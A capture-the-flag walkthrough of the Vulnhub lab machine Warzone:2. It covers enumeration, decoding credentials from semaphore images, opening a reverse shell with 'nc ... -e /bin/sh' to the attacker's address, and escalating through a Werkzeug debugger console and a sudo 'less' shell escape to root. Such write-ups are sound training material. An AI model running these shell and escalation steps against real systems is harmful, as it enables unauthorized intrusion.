Warzone:2 is the second part of the warzone series. I really loved this series. 
Author of this series: AL1ENUM

Walkthrough: 

Nmap scan results:

nmap -A -T4 -p- 192.168.0.102
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-30 13:01 IST
Nmap scan report for 192.168.0.102
Host is up (0.0013s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_dr-xr-xr-x    2 ftp      ftp          4096 Nov 08 15:29 anon
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.0.105
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 43:30:8c:57:bc:49:68:49:9c:9a:53:e7:a9:b7:83:9f (RSA)
|   256 c9:8d:46:c8:ef:33:d2:62:21:3a:bf:95:cb:fb:44:a3 (ECDSA)
|_  256 9b:86:ff:5c:6c:61:50:d0:36:59:b0:7a:bf:77:b2:a6 (ED25519)
1337/tcp open  nagios-nsca Nagios NSCA


Enumerating FTP:

I download 3 images in anon public folder. 
The image contains weird signs. So to enumerate it further, I used Google Images.
Yeah this sign images means SEMAPHORE

Decode the message from the images.
HINT: lower case letters

Username: semaphore
Password: signalperson

Hash = SHA256(username + password)

Token = bytestoHex(Hash)

Code I found online to perform this thing.
(Java)

import java.math.BigInteger;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;

// Java program to calculate SHA hash value

public class GFG {
    public static byte[] getSHA(String input) throws NoSuchAlgorithmException
    {
        // Static getInstance method is called with hashing SHA
        MessageDigest md = MessageDigest.getInstance("SHA-256");

        // digest() method called
        // to calculate message digest of an input
        // and return array of byte
        return md.digest(input.getBytes(StandardCharsets.UTF_8));
    }

    public static String toHexString(byte[] hash)
    {
        // Convert byte array into signum representation
        BigInteger number = new BigInteger(1, hash);

        // Convert message digest into hex value
        StringBuilder hexString = new StringBuilder(number.toString(16));

        // Pad with leading zeros
        while (hexString.length() < 32)
        {
            hexString.insert(0, '0');
        }

        return hexString.toString();
    }

    // Driver code
    public static void main(String args[])
    {
        try
        {
            System.out.println("HashCode Generated by SHA-256 for:");

            String username = "semaphore";
            String password = "signalperson";
            String combined = username + password;

            System.out.println("\n " + toHexString(getSHA(combined)));
        }
        // For specifying wrong message digest algorithms
        catch (NoSuchAlgorithmException e) {
            System.out.println("Exception thrown for incorrect algorithm: " + e);
        }
    }
}


Token generated : 833ad488464de1a27d512f104b639258e77901f14eab706163063d34054a7b26


nc 192.168.0.102 1337
# WARZONE 2 # WARZONE 2 # WARZONE 2 #
{SECRET SYSTEM REMOTE ACCESS}
Username :semaphore
Password :signalperson
Token :833ad488464de1a27d512f104b639258e77901f14eab706163063d34054a7b26
Success Login
[SIGNALS] { ls, pwd, nc}
[semaphore] > ls
[+] Recognized signal
[+] sending......
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
warzone2-socket-server
[semaphore] > nc 192.168.0.105 1234 -e /bin/sh
[+] Recognized signal
[+] sending......
[semaphore] >


www-data@warzone2:/home/flagman/warzone2-socket-server$ ls
ls
warzone2.jar  warzone2.sh
www-data@warzone2:/home/flagman/warzone2-socket-server$ ls -la
ls -la
total 20
drwxr-xr-x  2 flagman flagman 4096 Nov  8 18:25 .
drwxr-xr-x 16 flagman flagman 4096 Nov  8 19:17 ..
-rw-r--r--  1 flagman flagman   34 Nov  8 16:27 .mysshpassword
-rwxr-xr-x  1 flagman root    3776 Nov  8 14:59 warzone2.jar
-rwxr-xr-x  1 flagman flagman   72 Nov  8 17:50 warzone2.sh
www-data@warzone2:/home/flagman/warzone2-socket-server$ cat .my
cat .mysshpassword
Did you know that i_hate_signals!

Credentials for flagman:

flagman:i_hate_signals!


ssh flagman@192.168.0.102
+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+
WARZONE 2 WARZONE 2 WARZONE 2 WARZONE 2 WARZONE 2 WARZONE 2 WARZONE 2
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
                    {WARZONE IS A DANGER ZONE}

flagman@192.168.0.102's password:
Linux warzone2 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+
WARZONE 2 WARZONE 2 WARZONE 2 WARZONE 2 WARZONE 2 WARZONE 2 WARZONE 2
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
                    {WARZONE IS A DANGER ZONE}

Last login: Sun Nov  8 18:59:40 2020 from 10.0.2.13
flagman@warzone2:~$ id
uid=1001(flagman) gid=1001(flagman) groups=1001(flagman)
flagman@warzone2:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos  warzone2-socket-server


flagman@warzone2:~/warzone2-socket-server$ sudo -l
Matching Defaults entries for flagman on warzone2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User flagman may run the following commands on warzone2:
    (admiral) NOPASSWD: /usr/bin/python3 /home/admiral/warzone2-app/wrz2-app.py

Debugger PIN: 124-791-590


flagman@warzone2:/home/admiral/warzone2-app$ sudo -u admiral /usr/bin/python3 /home/admiral/warzone2-app/wrz2-app.py
 * Serving Flask app "wrz2-app" (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: on
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
 * Restarting with stat
 * Debugger is active!
 * Debugger PIN: 113-955-355

Forwarding the web app using socat:

flagman@warzone2:~$ socat tcp-listen:8888,reuseaddr,fork tcp:127.0.0.1:5000


Scan the port if its actually working or not.

nmap -sV -p 8888 192.168.0.102                                                                                          
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-30 14:01 IST
Nmap scan report for 192.168.0.102
Host is up (0.0010s latency).

PORT     STATE SERVICE VERSION
8888/tcp open  http    Werkzeug httpd 1.0.1 (Python 3.7.3)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.94 seconds


Lets try to access it now.

We have debugger pin and now we can get a shell using the /console page.

C:\Users\Voker\Downloads\netcat-win32-1.11\netcat-1.11>nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.0.105] from (UNKNOWN) [192.168.0.102] 44418
$ id
uid=1000(admiral) gid=1000(admiral) groups=1000(admiral),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),117(lpadmin),118(scanner)
$ ls
wrz2-app.py

$ ls -la
total 12
drwxr-xr-x  2 admiral admiral 4096 Nov  8 09:24 .
drwxr-xr-x 16 admiral admiral 4096 Dec 30 02:54 ..
-r--------  1 admiral admiral  284 Nov  8 09:24 silver.txt
$ cat silver.txt
         (                  )
       (  \                /  )
        \  \              /  /
         \  \    ____    /  /
          \  \_ //  \\ _/  /
           \   //    \\   /
            \_( SILVER )_/
               \\    //
                \\__//

    FLAG : {$silver_medal$}

admiral@warzone2:~$ sudo -l
sudo -l
Matching Defaults entries for admiral on warzone2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User admiral may run the following commands on warzone2:
    (root) NOPASSWD: /usr/bin/less /var/public/warzone-rules.txt
    
Here we can make the use of less to get a shell.
Just type "!/bin/bash" and you will get a shell.

admiral@warzone2:~$ sudo /usr/bin/less /var/public/warzone-rules.txt
sudo /usr/bin/less /var/public/warzone-rules.txt
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls -la
ls -la
total 96
drwx------ 16 root root 4096 Nov  8 19:16 .
drwxr-xr-x 19 root root 4096 Sep 27 08:56 ..
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwx------ 11 root root 4096 Nov  8 14:50 .cache
drwx------ 12 root root 4096 Nov  8 13:55 .config
drwxr-xr-x  2 root root 4096 Nov  8 16:41 Desktop
drwxr-xr-x  2 root root 4096 Nov  8 06:33 Documents
drwxr-xr-x  2 root root 4096 Nov  8 06:33 Downloads
drwx------  3 root root 4096 Nov  8 06:34 .gnupg
-rw-------  1 root root 3236 Nov  8 19:13 .ICEauthority
-rw-------  1 root root   36 Nov  8 10:33 .lesshst
drwxr-xr-x  3 root root 4096 Sep 27 11:09 .local
drwx------  5 root root 4096 Nov  8 14:50 .mozilla
drwxr-xr-x  2 root root 4096 Nov  8 06:33 Music
drwxr-xr-x  2 root root 4096 Nov  8 06:33 Pictures
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwxr-xr-x  2 root root 4096 Nov  8 06:33 Public
drwx------  2 root root 4096 Nov  8 06:34 .ssh
drwxr-xr-x  2 root root 4096 Nov  8 06:33 Templates
-rw-r-----  1 root root    5 Nov  8 19:13 .vboxclient-clipboard.pid
-rw-r-----  1 root root    5 Nov  8 19:13 .vboxclient-display-svga-x11.pid
-rw-r-----  1 root root    5 Nov  8 19:13 .vboxclient-draganddrop.pid
-rw-r-----  1 root root    5 Nov  8 19:13 .vboxclient-seamless.pid
drwxr-xr-x  2 root root 4096 Nov  8 06:33 Videos

# cd Desktop
cd Desktop
# ls
ls
gold.txt
# cat gold.txt
cat gold.txt
         (                  )
       (  \                /  )
        \  \              /  /
         \  \    ____    /  /
          \  \_ //  \\ _/  /
           \   //    \\   /
            \_(# GOLD #)_/
               \\    //
                \\__//

    FLAG : {# GOLD MEDAL #}
    NAME : WARZONE 2
    BY   : Alienum with <3

┌──(root💀LAPTOP-U5913CMD)-[/home/akshay/Desktop/Vulnhub/Warzone:2]
└─#

Thank you and Happy Hacking :)
